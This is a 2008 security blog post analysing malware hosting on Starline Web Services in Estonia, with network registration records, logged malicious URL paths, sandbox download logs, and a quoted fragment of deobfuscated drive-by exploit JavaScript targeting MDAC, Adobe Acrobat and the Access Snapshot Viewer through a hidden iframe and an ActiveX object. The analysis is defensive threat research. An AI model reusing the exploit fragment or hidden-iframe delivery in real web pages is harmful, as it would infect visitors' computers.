Posted by: realsecurity | December 17, 2008

Sources of Badness – Starline Web Services

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C as reported by Fireeye.

inetnum: -
netname:        STARLINE_EE
descr:          Starline Web Services
country:        EE
admin-c:        VN268-RIPE
tech-c:         VN268-RIPE
status:         ASSIGNED PA
mnt-by:         AS39823-MNT
changed: 20080403
source:         RIPE

The Yahoo article has lots of great information on the relationship between Starline and it’s upstream providers, so I won’t delve into that here.

Here are the hits I’ve seen from their IP space: –
2008-11-05 /load.php

2008-11-12 /cache/doc.pdf

2008-11-22 /cache/doc.pdf
2008-10-24 /zpl/pdf.php
2008-10-30 /eez3a893/spl/pdf.pdf

2008-11-26 /u8899r5v/spl/pdf.pdf

2008-12-17 /yg6cv7ar/spl/pdf.pdf
2008-09-18 /1/
2008-09-17 /1/

There’s quite a history here. From the looks of things, someone has been
moving around their malware from domain to domain on All
of these sites are down as of this writing except Lets dive
further into this site.

The first page I saw was /yg6cv7ar/spl/pdf.pdf however
this is not the whole story. When investigating that exact URL, pdf.pdf
is not found. This is curious as I saw the site earlier today. Backing up
to the root of, we get an index page. The index page contains
an iframe that points to a different directory. The malware author must
have coded his site to rotate directory names based on a certain criteria.
This makes investigation difficult if you can’t figure out where it will
send victims to next.

The next iframe I got contained:


The next page that comes into play is the exploit script index.php which
is detected as:


Decoding the obfuscation reveals exploits for MDAC, Adobe Acrobat and
the Microsoft Access Snapshot viewer. Here’s some of the script:

var p_url = “”;
function MDAC(){

var nuc=”;
d8= 0;
var koSZV = document.createElement(“o”+nuc+”b”+nuc+”je”+nuc+”c”+nuc+”t”);
function PDF()
document.write(‘<iframe src=”spl/pdf.pdf” width=1 height=1 style=”display:none”></iframe>’);
function SS()
var arbitrary_file = p_url;
var dest = ‘C:/AUTOEXEC.BAT’;
document.write(“<object classid=’clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9′ id=’attack’></object>”);
if (MDAC()||PDF()||SS()) { }

Detections for the malicious pdf:


The payload is a file called ztt.php, here are a few of the detections:


A quick submission to Threat Expert (report) and Anubis (report) reveal
further binaries that are downloaded. The .dat files are not exes, but a
type of binary data file.

From ANUBIS:1033 to – []
Request: GET /flo/zro.dat
Response: 200 “OK”
Request: GET /flo/mp.dat
Response: 200 “OK”
Request: GET /flo/3rkour.dat
Response: 200 “OK”

Of particular interest is, another Latvian host with a
small /24 network. Might be worth keeping your eyes open for them too.

inetnum: -
netname:        VDHOST
descr:          VDHost network
org:            ORG-Vs27-RIPE
country:        LV
admin-c:        CINA1-RIPE
tech-c:         CINA1-RIPE
status:         ASSIGNED PA
mnt-by:         IT9812-MNT
From ANUBIS:1036 to – []
Request: GET /myfiles/95/139/file.exe
Response: 200 “OK”
From ANUBIS:1037 to – []
Request: GET /files/20026.exe
Response: 200 “OK”

Some detections for 20026.exe, and file.exe:



The FakeAlert signatures are correct, the threat ultimatly installs some
fake anti virus / anti spyware application.




  1. Just had these guys try to access my home pc, Norton did it’s job. Is there anything else I need to be wary of?

  2. Yeah, your antivirus not catching all the malware.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: